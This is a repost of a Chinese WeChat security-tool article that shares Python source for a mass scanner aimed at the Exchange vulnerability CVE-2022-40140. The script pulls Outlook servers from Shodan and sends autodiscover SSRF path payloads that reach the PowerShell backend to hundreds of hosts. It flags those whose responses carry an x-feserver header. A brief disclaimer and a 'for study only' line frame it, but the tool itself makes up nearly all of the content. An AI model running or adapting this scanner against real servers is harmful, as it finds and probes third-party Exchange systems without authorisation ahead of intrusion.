CVE-2022-40140漏洞扫描器
2022-11-15 08:3:0 Author: Web安全工具库(查看原文) 阅读量:74 收藏

===================================

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

源码学习分享

''' /$$                     /$$|__/                    | $$ /$$  /$$$$$$   /$$$$$$$| $$$$$$$   /$$$$$$  /$$   /$$ /$$$$$$$   /$$$$$$| $$ /$$__  $$ /$$_____/| $$__  $$ /$$__  $$| $$  | $$| $$__  $$ /$$__  $$| $$| $$  \ $$|  $$$$$$ | $$  \ $$| $$  \__/| $$  | $$| $$  \ $$| $$  \ $$| $$| $$  | $$ \____  $$| $$  | $$| $$      | $$  | $$| $$  | $$| $$  | $$| $$| $$$$$$$/ /$$$$$$$/| $$$$$$$/| $$      |  $$$$$$/| $$  | $$|  $$$$$$/|__/| $$____/ |_______/ |_______/ |__/       \______/ |__/  |__/ \______/    | $$    | $$    |__/CVE-2022-40140 MASS SCANNER'''

import grequestsimport requestsfrom shodan import Shodanimport uuidimport loggingimport urllib3import urllibimport timeimport argparsefrom urllib.parse import urlsplit, urlunsplit



api = Shodan('YOUR SHODAN API KEY')
payloads = [  "/autodiscover/[email protected]/owa/?&Email=autodiscover/[email protected]&Protocol=XYZ&FooProtocol=Powershell",  "/autodiscover/autodiscover.json?a..foo.var/owa/?&Email=autodiscover/autodiscover.json?a..foo.var&Protocol=XYZ&FooProtocol=Powershell",    "/autodiscover/autodiscover.json?a..foo.var/owa/?&Email=autodiscover/autodiscover.json?a..foo.var&Protocol=XYZ&FooProtocol=%50owershell"]
dork ="http.title:\"Outlook\""

repeated= []

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def do_something(r):    if r != None and r and 'x-feserver' in r.headers:        print(r.url,' VULNERABLE', r.status_code)

def base_url(url, with_path=False):    parsed = urllib.parse.urlparse(url)    path   = '/'.join(parsed.path.split('/')[:-1]) if with_path else ''    parsed = parsed._replace(path=path)    parsed = parsed._replace(params='')    parsed = parsed._replace(query='')    parsed = parsed._replace(fragment='')    return parsed.geturl()
def main():
    start = 0    end = 100    user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0'}    while start < end:        results = api.search(dork,page=start)        urls = []        print('Pagina ', start)        for banner in results["matches"]:            if 'hostnames' in banner:                for hostname in banner["hostnames"]:                    if hostname in repeated:                        continue                    hostname = (base_url('http://'+hostname)).split("http://")[1]                    repeated.append(hostname)                    urls.append('http://'+hostname)                    urls.append('https://'+hostname)                    urls.append('http://'+hostname+':'+str(banner["port"]))                    urls.append('https://'+hostname+':'+str(banner["port"]))
        for payload in payloads:            results = grequests.map((grequests.get(u+payload, headers=user_agent, allow_redirects=False, timeout=10, verify = 'https' in u) for u in urls))            for result in results:                do_something(result)        
        start += 1
if __name__ == '__main__':    main()

该内容转载自网络,仅供学习交流,勿作他用,如有侵权请联系删除。

关 注 有 礼

欢迎关注公众号:Web安全工具库

后台回复:20221115

获取每日抽奖送书


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247505934&idx=3&sn=af0f528e3e95b649aed3dd4e1ae49abd&chksm=ebb5370ddcc2be1b3017664e97deb3c4a41a9e5f3bc514559de1dab52a55344414d7c5fed0ac#rd
如有侵权请联系:admin#unsafe.sh